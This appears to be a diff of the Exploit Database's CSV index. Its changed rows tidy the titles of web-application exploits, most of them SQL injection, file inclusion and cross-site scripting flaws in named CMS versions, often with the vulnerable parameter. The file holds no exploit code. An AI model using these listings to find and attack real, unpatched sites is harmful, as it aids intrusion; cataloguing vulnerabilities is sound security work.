id,file,description,date,author,platform,type,port 9127,platforms/php/webapps/9127.txt,"d.net CMS - Arbitrary Reinstall/Blind SQL Injection",2009-07-11,darkjoker,php,webapps,0 9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 9130,platforms/php/webapps/9130.txt,"PHP AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0 -9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - (double ext) Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0 +9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0 9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps,0 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0 @@ -21367,7 +21380,7 @@ id,file,description,date,author,platform,type,port 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,php,webapps,0 9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusion",2009-08-18,jetli007,php,webapps,0 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0 -9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection",2009-08-18,NoGe,php,webapps,0 +9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 @@ -21569,8 +21582,8 @@ id,file,description,date,author,platform,type,port 16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistent Cross-Site Scripting",2011-01-17,Penguin,php,webapps,0 9962,platforms/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - Arbitrary File Upload / Code Execution",2009-10-19,boecke,php,webapps,0 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0 -9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 - store() SQL Injection",2009-10-26,bookoo,php,webapps,0 -9965,platforms/php/webapps/9965.txt,"RunCMS 2ma - post.php SQL Injection",2009-10-26,bookoo,php,webapps,0 +9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 - 'store()' SQL Injection",2009-10-26,bookoo,php,webapps,0 +9965,platforms/php/webapps/9965.txt,"RunCMS 2ma - 'post.php' SQL Injection",2009-10-26,bookoo,php,webapps,0 9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 - Team Services Source Code Disclosure",2009-10-26,"Daniel Martin",asp,webapps,0 33434,platforms/windows/webapps/33434.rb,"HP Release Control - Authenticated XXE (Metasploit)",2014-05-19,"Brandon Perry",windows,webapps,80 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",hardware,webapps,80 @@ -23604,7 +23617,7 @@ id,file,description,date,author,platform,type,port 14350,platforms/php/webapps/14350.txt,"Joomla! Component 'com_qcontacts' - SQL Injection",2010-07-13,_mlk_,php,webapps,0 14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script - SQL Injection",2010-07-13,D4rk357,php,webapps,0 14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0 -14354,platforms/php/webapps/14354.txt,"AJ Article - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0 +14354,platforms/php/webapps/14354.txt,"AJ Article 3.0 - Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0 14356,platforms/php/webapps/14356.txt,"CustomCMS - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0 14357,platforms/php/webapps/14357.txt,"2DayBiz Businesscard Script - Authentication Bypass",2010-07-14,D4rk357,php,webapps,0 14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",php,webapps,0 @@ -25586,7 +25599,7 @@ id,file,description,date,author,platform,type,port 20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0 20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0 -21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 +21005,platforms/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 21022,platforms/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution",2001-07-21,"giancarlo pinerolo",php,webapps,0 21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 @@ -27972,7 +27985,7 @@ id,file,description,date,author,platform,type,port 26182,platforms/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-20,bl2k,php,webapps,0 26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 - browse.php Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0 26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,php,webapps,0 -26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Newbb_plus and Messages Modules - Multiple SQL Injections",2005-08-22,"James Bercegay",php,webapps,0 +26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection",2005-08-22,"James Bercegay",php,webapps,0 26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b - Comments Module moderate Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - user.php htmltext Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - viewdownload.php SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 @@ -28583,7 +28596,7 @@ id,file,description,date,author,platform,type,port 26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 - article.php SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise - news_and_events_new.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise - news.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0 -26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - Type Parameter SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0 +26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - 'type' Parameter SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0 26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0 26972,platforms/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 @@ -28651,7 +28664,7 @@ id,file,description,date,author,platform,type,port 27357,platforms/php/webapps/27357.txt,"Simplog 1.0.2 - Information Disclosure",2006-03-04,Retard,php,webapps,0 27358,platforms/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 - 'index.php' page Parameter Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0 27359,platforms/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 - dv_gbook.php f Parameter Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0 -27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - Bigshow.php Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0 +27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0 27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -28788,7 +28801,7 @@ id,file,description,date,author,platform,type,port 27223,platforms/php/webapps/27223.txt,"dotProject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - PMLite.php SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0 +27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0 27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0 27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 - view_all_set.php Multiple Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 - manage_user_page.php sort Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 @@ -28809,7 +28822,7 @@ id,file,description,date,author,platform,type,port 27252,platforms/php/webapps/27252.txt,"CuteNews 1.4.1 - show_news.php Cross-Site Scripting",2006-02-20,imei,php,webapps,0 27254,platforms/php/webapps/27254.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter Cross-Site Scripting",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0 -27256,platforms/php/webapps/27256.txt,"RunCMS 1.x - Ratefile.php Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0 +27256,platforms/php/webapps/27256.txt,"RunCMS 1.x - 'Ratefile.php' Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0 27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0 27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection",2006-02-22,trueend5,php,webapps,0 27261,platforms/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Inclusion",2006-02-22,trueend5,php,webapps,0 @@ -28827,7 +28840,7 @@ id,file,description,date,author,platform,type,port 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,php,webapps,0 -27276,platforms/php/webapps/27276.html,"BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0 +27276,platforms/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - (pages.php page_name Parameter) SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0 @@ -28941,9 +28954,9 @@ id,file,description,date,author,platform,type,port 27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 - month.php SQL Injection",2006-06-07,"CrAzY CrAcKeR",php,webapps,0 27443,platforms/php/webapps/27443.txt,"Extcalendar 1.0 - Cross-Site Scripting",2006-03-18,Soothackers,php,webapps,0 27444,platforms/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 - Class_DB_MySQL.php Cross-Site Scripting",2006-03-18,r57shell,php,webapps,0 -27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter SQL Injection",2006-03-18,Linux_Drox,php,webapps,0 -27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 -27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - cart.php Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 +27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' SQL Injection",2006-03-18,Linux_Drox,php,webapps,0 +27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 +27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - 'cart.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 27448,platforms/php/webapps/27448.txt,"phpWebSite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0 @@ -29516,7 +29529,7 @@ id,file,description,date,author,platform,type,port 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0 28261,platforms/php/webapps/28261.txt,"RadScripts - a_editpage.php Filename Variable Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0 -28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - Page Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0 +28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0 28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 - links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0 28268,platforms/php/webapps/28268.txt,"LinksCaffe 3.0 - counter.php tablewidth Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0 @@ -29586,7 +29599,7 @@ id,file,description,date,author,platform,type,port 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 -28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 - Fname Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 +28378,platforms/php/webapps/28378.txt,"miniBloggie 1.0 - 'Fname' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 28382,platforms/php/webapps/28382.txt,"WordPress Plugin WP-DB Backup 1.6/1.7 - edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0 @@ -29619,10 +29632,10 @@ id,file,description,date,author,platform,type,port 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0 28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0 -28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 - item_main.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 -28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - upload_form.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 -28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - download.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 -28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - admin.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 +28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 - 'item_main.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 +28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 +28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 +28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0 28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0 28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 @@ -29934,7 +29947,7 @@ id,file,description,date,author,platform,type,port 28831,platforms/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0 28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusion",2006-10-19,SuBzErO,php,webapps,0 28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 - config.php SQL Injection",2006-10-20,G1UK,php,webapps,0 -28838,platforms/php/webapps/28838.txt,"ClanLite - Config-PHP.php Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0 +28838,platforms/php/webapps/28838.txt,"ClanLite - 'conf-php.php' Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0 28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - smumdadotcom_ascyb_alumni/mod.php katalog Module query Parameter Cross-Site Scripting",2006-10-23,MP,php,webapps,0 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - mod.php mod Parameter Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - Cat Parameter Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0 @@ -30785,7 +30798,7 @@ id,file,description,date,author,platform,type,port 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection",2007-05-07,Bulan,php,webapps,0 29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 - order_form.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - Sendmail.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 -29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - PID Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0 +29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - 'pid' Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0 29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal",2013-12-01,"Cesar Neira",hardware,webapps,0 29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0 29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting",2007-05-07,"John Martinelli",php,webapps,0 @@ -32079,8 +32092,8 @@ id,file,description,date,author,platform,type,port 32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0 -32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 -32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 +32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 +32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0 32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0 @@ -32177,7 +32190,7 @@ id,file,description,date,author,platform,type,port 32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - administrator/popups/index3pop.php mosConfig_sitename Parameter Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - 'mambots/editors/mostlyce/' PHP/connector.php Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0 -32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'forum/neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0 +32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0 32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injection",2008-08-15,baltazar,php,webapps,0 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 @@ -33218,9 +33231,9 @@ id,file,description,date,author,platform,type,port 34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80 34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector - 'id' Parameter SQL Injection",2010-06-28,Tr0y-x,php,webapps,0 34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' Parameter SQL Injection",2010-06-28,S.W.T,php,webapps,0 -34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - admin/admin.php cat Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 -34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - search.php search Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0 -34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - admin/admin.php Short1 Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - 'cat' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - 'search' Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0 +34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - 'short1' Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 34213,platforms/php/webapps/34213.txt,"PHP Bible Search - bible.php chapter Parameter SQL Injection",2010-06-29,"L0rd CrusAd3r",php,webapps,0 34214,platforms/php/webapps/34214.txt,"PHP Bible Search - bible.php chapter Parameter Cross-Site Scripting",2010-06-29,"L0rd CrusAd3r",php,webapps,0 34215,platforms/php/webapps/34215.txt,"MySpace Clone 2010 - SQL Injection / Cross-Site Scripting",2010-06-28,"L0rd CrusAd3r",php,webapps,0 @@ -34117,7 +34130,7 @@ id,file,description,date,author,platform,type,port 35615,platforms/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Parameter Remote Command Execution",2011-04-14,"High-Tech Bridge SA",php,webapps,0 35616,platforms/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",php,webapps,0 35617,platforms/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System - 'Keyword' Parameter Cross-Site Scripting",2011-04-14,d3c0der,php,webapps,0 -35618,platforms/php/webapps/35618.txt,"RunCMS 'partners' Module - 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 +35618,platforms/php/webapps/35618.txt,"RunCMS Module Partners - 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion / SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection",2011-04-16,KedAns-Dz,php,webapps,0 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 / 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0 @@ -34447,7 +34460,7 @@ id,file,description,date,author,platform,type,port 36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 - Unrestricted Arbitrary File Upload",2015-02-23,"CWH Underground",php,webapps,80 36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80 